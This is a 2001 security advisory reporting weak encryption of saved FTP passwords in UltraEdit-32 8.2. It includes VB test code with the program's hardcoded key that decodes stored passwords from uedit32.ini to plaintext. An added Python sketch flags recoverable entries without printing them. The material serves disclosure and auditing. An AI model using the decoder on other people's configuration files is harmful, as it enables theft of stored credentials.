UltraEdit FTP client: insufficiently strong password protection


Published: 2001-08-25
Updated: 2001-08-25
Severity:
Threat level: password recovery
Error type: design error
Exploitation mode: server mode

Affected systems
IDM Computer Solutions, Inc UltraEdit-32 8.2
   - Microsoft Windows 98
   - Microsoft Windows 95
   - Microsoft Windows NT 4.0
   - Microsoft Windows NT 3.5
   - Microsoft Windows 2000
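Detailed description
UltraEdit is a multi-purpose text editor that supports HTML, C/C++, VB,
Java, Perl, XML, and C#. It also includes a hex editor and a small FTP
client. One feature of the FTP client is that it can remember the FTP
password for the next use. When it does so, the algorithm it uses to
encrypt the password is very simple, which makes the FTP account
password recoverable.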

Test code
' UltraEdit FTP password decryption (stored in uedit32.ini)
'
' Taken from the help-file:
'
' This checkbox determines if UltraEdit will save the password for later
' reference. If not the user will be prompted for the password as required. Note
' - if the password is saved it is stored on the system. It is encrypted however
' the encryption mechanism is unsophisticated and should not be relied upon as a
' method of security.

' Masterkey. Taken from the UltraEdt.exe (19 characters)
Private Const Masterkey = "sdfkh we;34u[ jwef "

' Decode a single character.
' i_Asc is the stored byte value, i_Pos its 1-based position in the password.
Public Function UEDecode(ByVal i_Asc As Integer, ByVal i_Pos As Integer) As Integer

    Dim k As Integer

    ' The key repeats every 19 characters; Mid$ is 1-based, so map 0 to 19
    i_Pos = i_Pos Mod 19
    If i_Pos = 0 Then i_Pos = 19

    k = Asc(Mid$(Masterkey, i_Pos, 1))

    ' The two terms share no bits, so the sum equals (i_Asc Xor k) And 127
    UEDecode = ((Not i_Asc) And k) + (i_Asc And ((Not k) And 127))

End Function

' Decode password.
' str_password is the stored value: two hex digits per password character.
Public Function UEDecodeString(str_password As String) As String

    Dim i As Integer

    UEDecodeString = ""

    For i = 1 To (Len(str_password) \ 2)
        UEDecodeString = UEDecodeString & Chr$(UEDecode(Val("&H" & Mid$(str_password, (2 * (i - 1)) + 1, 2)), i))
    Next i

End Function

Solution
Do not use UltraEdit's FTP client.
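
Added example (not part of the original advisory and not UltraEdit's code): the decode routine in the test code reduces to a 7-bit XOR with a fixed 19-character key, so this Python sketch checks that equivalence and uses it to flag INI values that are recoverable under the scheme, reporting only where they are stored. The section and key names in the sample INI are constructed, because the advisory does not give the layout of uedit32.ini.

```python
import configparser
import string

MASTERKEY = b"sdfkh we;34u[ jwef "   # 19-character constant from the VB listing
PRINTABLE = set(string.printable.encode()) - set(b"\t\n\r\x0b\x0c")

def vb_byte(a, pos):
    """Literal port of UEDecode; pos is 1-based, as in the VB code."""
    k = MASTERKEY[(pos - 1) % 19]
    return (~a & k) + (a & (~k & 127))

def xor_byte(a, pos):
    """The same operation written plainly: 7-bit XOR with a repeating key."""
    return (a ^ MASTERKEY[(pos - 1) % 19]) & 0x7F

def transform(data):
    """Encoding and decoding are this one function (XOR is its own inverse)."""
    return bytes(xor_byte(b, i) for i, b in enumerate(data, 1))

def is_recoverable(value, min_len=4):
    """Heuristic: hex string that turns into printable ASCII under the scheme."""
    try:
        raw = bytes.fromhex(value)
    except ValueError:
        return False
    return len(raw) >= min_len and all(c in PRINTABLE for c in transform(raw))

def audit_ini(text):
    """Return (section, key) pairs holding a recoverable value, not the value."""
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    cp.optionxform = str          # keep key names as written
    cp.read_string(text)
    return [(s, k) for s in cp.sections()
            for k, v in cp[s].items() if is_recoverable(v)]

# Constructed sample: section and key names are hypothetical, not UltraEdit's.
SAMPLE_INI = f"""[FTP Account 1]
Host=ftp.example.invalid
Port=21
Username=demo
Password={transform(b"Example-Pw1").hex().upper()}
"""

if __name__ == "__main__":
    print(audit_ini(SAMPLE_INI))
```

The match is a heuristic and can flag unrelated hex values; any entry it reports should be treated as a plaintext credential and the corresponding FTP password changed.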

Related information
"E. van Elk" <evelk@dsv.nl>